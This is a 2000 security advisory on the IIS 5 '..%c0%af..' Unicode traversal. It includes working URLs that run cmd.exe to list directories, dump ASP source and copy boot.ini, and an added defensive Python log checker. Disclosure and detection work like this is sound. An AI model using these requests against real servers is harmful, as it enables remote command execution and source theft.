______________________________________________________________________
NtWaK0
Bug / Security / Advisory
Saturday, October 21, 2000
IIS 5 and using ..%c0%af../winnt/system32/cmd.exe?/c+type+c:
To Read any ASP source Code of the server
______________________________________________________________________
o Synopsis
Based on http://www.wiretrip.net/rfp/p/doc.asp?id=57&iface=2
I did some research and found that ..%c0%af.. can be used to do
more than just directory listing :)
RISK FACTOR: HIGH
______________________________________________________________________
o Vulnerable Systems
IIS 5.0; maybe IIS 4, I did not check it.
______________________________________________________________________
o Vulnerability Information
Well, what I tried is reading ASP source code, and I was able to
using this syntax:
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot\home\*.*
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+type+c:\inetpub\wwwroot\home\default.asp
And sure here is the source code:
Dim sServerName, sLocalAddress, sRemoteAddress
sServerName = Request.ServerVariables("SERVER_NAME")
sLocalAddress = Request.ServerVariables("LOCAL_ADDR")
sRemoteAddress = Request.ServerVariables("REMOTE_ADDR") %>
Now let us do more stuff; you can save a file, for example:
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\boot.ini
so you will get prompted whether you want to save the file or open it.
Next I did
http://IPADDRESSTESTED/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\boot.ini+c:\bobo.ini
which gave me a different error ...
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
c:\boot.ini
The system cannot find the file specified.
0 file(s) copied.
Hrm, interesting, and the file is located in c:\boot.ini :)
At this point I stopped working on that, and sure, you can do more than
directory listing.
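An added example (not part of NtWaK0's post): a log-side check in Python that decodes the overlong UTF-8 sequence in ..%c0%af.. the way a lenient decoder would, then tests whether the canonical path climbs above the web root. Function names and the sample paths are my own, modelled on the advisory's URLs.

```python
import re
from urllib.parse import unquote_to_bytes

def decode_overlong(data: bytes) -> tuple[bytes, bool]:
    """Rewrite overlong 2-byte UTF-8 forms (lead byte 0xC0/0xC1) into the
    single ASCII byte a lenient decoder produces; %c0%af becomes '/'.
    Returns (rewritten bytes, whether any overlong form was seen)."""
    out, i, overlong = bytearray(), 0, False
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            overlong, i = True, i + 2
        else:
            out.append(b)
            i += 1
    return bytes(out), overlong

def escapes_webroot(path: str) -> bool:
    """True when normalising the decoded path climbs above the virtual root
    (the /scripts/../../winnt/... shape from the advisory)."""
    depth = 0
    for seg in re.split(r"[\\/]+", path.strip("\\/")):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def check_request_path(raw_path: str) -> dict:
    """Classify one still-encoded request path taken from an access log."""
    raw = unquote_to_bytes(raw_path.split("?", 1)[0])  # drop the ?/c+... query
    decoded, overlong = decode_overlong(raw)
    text = decoded.decode("utf-8", "replace")
    return {"decoded": text, "overlong_utf8": overlong,
            "traversal": escapes_webroot(text)}

# Constructed sample paths (hypothetical log lines), modelled on the advisory.
SAMPLE_PATHS = [
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:%5Cinetpub",
    "/scripts/../../winnt/system32/cmd.exe",
    "/home/default.asp",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(check_request_path(p), p)
```

A plain percent-decode of the first path still shows "..\xc0\xaf.." rather than "../..", which is why a filter that only looks for ../ after URL decoding misses it.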
______________________________________________________________________
o Resolution
Microsoft has released MS00-078 to warn of the problem. The patch from
MS00-057 ("File permission canonicalization") fixes this problem.
______________________________________________________________________
o Credits
The discovery of this vulnerability was conducted by Par Osterberg;
some other research was done by rain forest puppy and some by NtWaK0.
______________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and I'm
not even too sure about that one" -- Dennis Hughes, FBI.